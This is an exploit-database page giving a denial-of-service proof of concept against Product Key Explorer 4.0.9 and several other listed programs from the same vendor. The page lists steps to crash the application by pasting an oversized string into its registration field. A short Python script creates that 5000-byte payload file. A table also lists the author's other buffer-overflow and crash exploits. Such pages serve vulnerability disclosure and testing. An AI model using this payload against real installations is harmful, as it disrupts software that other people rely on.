Become a patron and gain access to the dashboard, Schedule scans, API and Search patron
Author
T3jv1l
Platform
windows_x86
Release date
2018-12-27
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 | # Exploit Title: Product Key Explorer 4.0.9 - Denial of Service (PoC) # Date: 2018-12-25 # Exploit Author: T3jv1l # Vendor Homepage: :http://www.nsauditor.com # Software: http://www.nsauditor.com/downloads/productkeyexplorer_setup.exe # Contact: https://twitter.com/T3jv1l # Version: Product Key Explorer 4.0.9 # Tested on: Windows 7 SP1 x86 # Other affected software from the vendor # Software: http://www.nsauditor.com/downloads/backeyrecovery_setup.exe # Software: http://www.nsauditor.com/downloads/apkf_setup.exe # Software: http://www.nsauditor.com/downloads/officeproductkeyfinder_setup.exe # Software: http://spotauditor.nsauditor.com/downloads/spotauditor_setup.exe # Software: http://www.nsauditor.com/downloads/spotmsn_setup.exe # Software: http://www.nsauditor.com/downloads/spotie_setup.exe # Software: http://www.nsauditor.com/downloads/spotftp_setup.exe # Software: http://www.network-inventory-software.com/downloads/nhsi_setup.exe # Software: http://www.nsauditor.com/downloads/nsi_setup.exe # Software: http://www.nsauditor.com/downloads/blueauditor_setup.exe # Software: http://www.nsauditor.com/downloads/networksleuth_setup.exe # Software: http://www.nsauditor.com/downloads/remshutdown_setup.exe # Software: http://www.nsauditor.com/downloads/dnss_setup.exe # PoC: # 1. Download and install the setup file # 2. A file "PoC.txt" will be created # 3. Click Help > Register... in tool bar # 4. Copy the contents of the file (PoC.txt) and paste in the Registration Key/Name field # 5. Click OK and BOOMMMM !!!! #!/usr/bin/python buffer = "\x41" * 2000 buffer += "\x42" * 2000 buffer += "\x43" * 1000 payload = buffer try: f=open("PoC.txt","w") print "[+] Creating %s bytes payload..." %len(payload) f.write(payload) f.close() print "[+] File created!" except: print "File cannot be created" |
Release Date | Title | Type | Platform | Author |
---|---|---|---|---|
2020-04-17 | "Code Blocks 16.01 - Buffer Overflow (SEH) UNICODE" | local | windows | T3jv1l |
2019-01-22 | "CloudMe Sync 1.11.2 - Buffer Overflow + Egghunt" | remote | windows | T3jv1l |
2018-12-27 | "Product Key Explorer 4.0.9 - Denial of Service (PoC)" | dos | windows_x86 | T3jv1l |
2018-12-27 | "ShareAlarmPro 2.1.4 - Denial of Service (PoC)" | dos | windows_x86 | T3jv1l |
2018-12-27 | "NetShareWatcher 1.5.8 - Denial of Service (PoC)" | dos | windows_x86 | T3jv1l |
2018-09-11 | "HTML5 Video Player 1.2.5 - Denial of Service (PoC)" | dos | windows_x86 | T3jv1l |
2018-09-10 | "Any Sound Recorder 2.93 - Denial of Service (PoC)" | local | windows_x86 | T3jv1l |
2018-09-07 | "DVD Photo Slideshow Professional 8.07 - Buffer Overflow (SEH)" | local | windows | T3jv1l |
2018-04-26 | "Allok AVI to DVD SVCD VCD Converter 4.0.1217 - Buffer Overflow (SEH)" | local | windows | T3jv1l |
2018-04-24 | "Allok Video to DVD Burner 2.6.1217 - Buffer Overflow (SEH)" | local | windows | T3jv1l |
import requests
response = requests.get('https://www.nmmapper.com/api/v1/exploitdetails/46057/?format=json')
For full documentation follow the link above